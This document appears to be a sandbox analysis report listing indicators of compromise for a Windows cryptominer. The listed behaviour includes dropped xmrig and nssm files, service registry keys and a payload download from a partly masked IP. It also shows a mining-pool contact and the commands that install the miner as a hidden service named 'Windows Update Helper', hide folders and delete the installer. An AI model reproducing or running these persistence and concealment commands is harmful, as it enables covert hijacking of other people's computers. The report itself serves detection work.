Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\xmr_startup.bat
 
- [HKLM\SYSTEM\CurrentControlSet\Services\xxx] 'Start' = '00000002'
 - [HKLM\SYSTEM\CurrentControlSet\Services\xxx] 'ImagePath' = '%WINDIR%\xmr\nssm.exe'
 - [HKLM\SYSTEM\CurrentControlSet\Services\WinRing0_1_2_0] 'ImagePath' = '%WINDIR%\xmr\WinRing0x64.sys'
 
- 'xxx' %WINDIR%\xmr\nssm.exe
 - 'WinRing0_1_2_0' %WINDIR%\xmr\WinRing0x64.sys
 
- %TEMP%\_mei34042\vcruntime140.dll
 - %TEMP%\_mei34042\vcruntime140_1.dll
 - %TEMP%\_mei34042\_asyncio.pyd
 - %TEMP%\_mei34042\_bz2.pyd
 - %TEMP%\_mei34042\_ctypes.pyd
 - %TEMP%\_mei34042\_decimal.pyd
 - %TEMP%\_mei34042\_hashlib.pyd
 - %TEMP%\_mei34042\_lzma.pyd
 - %TEMP%\_mei34042\_multiprocessing.pyd
 - %TEMP%\_mei34042\_overlapped.pyd
 - %TEMP%\_mei34042\_queue.pyd
 - %TEMP%\_mei34042\_socket.pyd
 - %TEMP%\_mei34042\_ssl.pyd
 - %TEMP%\_mei34042\_wmi.pyd
 - %TEMP%\_mei34042\base_library.zip
 - %TEMP%\_mei34042\certifi\cacert.pem
 - %TEMP%\_mei34042\charset_normalizer\md.cp312-win_amd64.pyd
 - %TEMP%\_mei34042\charset_normalizer\md__mypyc.cp312-win_amd64.pyd
 - %TEMP%\_mei34042\libcrypto-3.dll
 - %TEMP%\_mei34042\libffi-8.dll
 - %TEMP%\_mei34042\libssl-3.dll
 - %TEMP%\_mei34042\pyexpat.pyd
 - %TEMP%\_mei34042\python312.dll
 - %TEMP%\_mei34042\pywin32_system32\pywintypes312.dll
 - %TEMP%\_mei34042\select.pyd
 - %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\installer
 - %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\license
 - %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\metadata
 - %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\record
 - %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\wheel
 - %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\top_level.txt
 - %TEMP%\_mei34042\setuptools\_vendor\jaraco\text\lorem ipsum.txt
 - %TEMP%\_mei34042\unicodedata.pyd
 - %TEMP%\_mei34042\win32\_win32sysloader.pyd
 - %TEMP%\_mei34042\win32\perfmon.pyd
 - %TEMP%\_mei34042\win32\servicemanager.pyd
 - %TEMP%\_mei34042\win32\win32api.pyd
 - %TEMP%\_mei34042\win32\win32evtlog.pyd
 - %TEMP%\_mei34042\win32\win32gui.pyd
 - %TEMP%\_mei34042\win32\win32security.pyd
 - %TEMP%\_mei34042\win32\win32service.pyd
 - %WINDIR%\xmr\winring0x64.sys
 - %WINDIR%\xmr\config.json
 - %WINDIR%\xmr\xmrig.exe
 - %WINDIR%\xmr\nssm.exe
 - %TEMP%\delete_self.bat
 - nul
 
- %WINDIR%\xmr\winring0x64.sys
 - %WINDIR%\xmr\config.json
 - %WINDIR%\xmr\xmrig.exe
 - %WINDIR%\xmr\nssm.exe
 - %APPDATA%\microsoft\windows\start menu\programs\startup\xmr_startup.bat
 
- %TEMP%\_mei34042\base_library.zip
 - %TEMP%\_mei34042\certifi\cacert.pem
 - %TEMP%\_mei34042\charset_normalizer\md.cp312-win_amd64.pyd
 - %TEMP%\_mei34042\charset_normalizer\md__mypyc.cp312-win_amd64.pyd
 - %TEMP%\_mei34042\libcrypto-3.dll
 - %TEMP%\_mei34042\libffi-8.dll
 - %TEMP%\_mei34042\libssl-3.dll
 - %TEMP%\_mei34042\pyexpat.pyd
 - %TEMP%\_mei34042\python312.dll
 - %TEMP%\_mei34042\pywin32_system32\pywintypes312.dll
 - %TEMP%\_mei34042\select.pyd
 - %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\installer
 - %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\license
 - %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\metadata
 - %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\record
 - %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\top_level.txt
 - %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\wheel
 - %TEMP%\_mei34042\setuptools\_vendor\jaraco\text\lorem ipsum.txt
 - %TEMP%\_mei34042\unicodedata.pyd
 - %TEMP%\_mei34042\vcruntime140.dll
 - %TEMP%\_mei34042\vcruntime140_1.dll
 - %TEMP%\_mei34042\win32\perfmon.pyd
 - %TEMP%\_mei34042\win32\servicemanager.pyd
 - %TEMP%\_mei34042\win32\win32api.pyd
 - %TEMP%\_mei34042\win32\win32evtlog.pyd
 - %TEMP%\_mei34042\win32\win32gui.pyd
 - %TEMP%\_mei34042\win32\win32security.pyd
 - %TEMP%\_mei34042\win32\win32service.pyd
 - %TEMP%\_mei34042\win32\_win32sysloader.pyd
 - %TEMP%\_mei34042\_asyncio.pyd
 - %TEMP%\_mei34042\_bz2.pyd
 - %TEMP%\_mei34042\_ctypes.pyd
 - %TEMP%\_mei34042\_decimal.pyd
 - %TEMP%\_mei34042\_hashlib.pyd
 - %TEMP%\_mei34042\_lzma.pyd
 - %TEMP%\_mei34042\_multiprocessing.pyd
 - %TEMP%\_mei34042\_overlapped.pyd
 - %TEMP%\_mei34042\_queue.pyd
 - %TEMP%\_mei34042\_socket.pyd
 - %TEMP%\_mei34042\_ssl.pyd
 - %TEMP%\_mei34042\_wmi.pyd
 
- '47.##.78.193':9001
 - 'mo#####.map.fastly.net':443
 - 'au##.c3pool.org':80
 
- http://47.##.78.193:9001/amin/nssm.exe via 47.##.78.193
 
- 'au##.c3pool.org':80
 
- DNS ASK mo#####.map.fastly.net
 - DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
 - DNS ASK au##.c3pool.org
 
- '%WINDIR%\xmr\nssm.exe' install xxx %WINDIR%\xmr\xmrig.exe --config=%WINDIR%\xmr\config.json
 - '%WINDIR%\xmr\nssm.exe' set xxx AppDirectory %WINDIR%\xmr
 - '%WINDIR%\xmr\nssm.exe' set xxx AppPriority BELOW_NORMAL_PRIORITY_CLASS
 - '%WINDIR%\xmr\nssm.exe' set xxx Description "Windows Update Helper"
 - '%WINDIR%\xmr\nssm.exe'
 - '%WINDIR%\xmr\xmrig.exe' --config=%WINDIR%\xmr\config.json
 
- '<SYSTEM32>\cmd.exe' /c "tasklist /fi "imagename eq xmrig.exe""
 - '<SYSTEM32>\tasklist.exe' /fi "imagename eq xmrig.exe"
 - '<SYSTEM32>\cmd.exe' /c "attrib +s +h "%WINDIR%\xmr""
 - '<SYSTEM32>\attrib.exe' +s +h "%WINDIR%\xmr"
 - '<SYSTEM32>\cmd.exe' /c "%WINDIR%\xmr\nssm.exe install xxx %WINDIR%\xmr\xmrig.exe --config=%WINDIR%\xmr\config.json"
 - '<SYSTEM32>\cmd.exe' /c "%WINDIR%\xmr\nssm.exe set xxx AppDirectory %WINDIR%\xmr"
 - '<SYSTEM32>\cmd.exe' /c "%WINDIR%\xmr\nssm.exe set xxx AppPriority BELOW_NORMAL_PRIORITY_CLASS"
 - '<SYSTEM32>\cmd.exe' /c "%WINDIR%\xmr\nssm.exe set xxx Description "Windows Update Helper""
 - '<SYSTEM32>\cmd.exe' /c "attrib +s +h "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\xmr_startup.bat""
 - '<SYSTEM32>\attrib.exe' +s +h "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\xmr_startup.bat"
 - '<SYSTEM32>\cmd.exe' /c "%TEMP%\delete_self.bat"
 - '<SYSTEM32>\timeout.exe' /t 3 /nobreak
 - '<SYSTEM32>\cmd.exe' /c "tasklist /fi "imagename eq xmrig.exe""' (with hidden window)
 - '<SYSTEM32>\cmd.exe' /c "attrib +s +h "%WINDIR%\xmr""' (with hidden window)
 - '<SYSTEM32>\cmd.exe' /c "%WINDIR%\xmr\nssm.exe install xxx %WINDIR%\xmr\xmrig.exe --config=%WINDIR%\xmr\config.json"' (with hidden window)
 - '<SYSTEM32>\cmd.exe' /c "%WINDIR%\xmr\nssm.exe set xxx AppDirectory %WINDIR%\xmr"' (with hidden window)
 - '<SYSTEM32>\cmd.exe' /c "%WINDIR%\xmr\nssm.exe set xxx AppPriority BELOW_NORMAL_PRIORITY_CLASS"' (with hidden window)
 - '<SYSTEM32>\cmd.exe' /c "%WINDIR%\xmr\nssm.exe set xxx Description "Windows Update Helper""' (with hidden window)
 - '<SYSTEM32>\cmd.exe' /c "attrib +s +h "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\xmr_startup.bat""' (with hidden window)
 - '<SYSTEM32>\cmd.exe' /c "%TEMP%\delete_self.bat"' (with hidden window)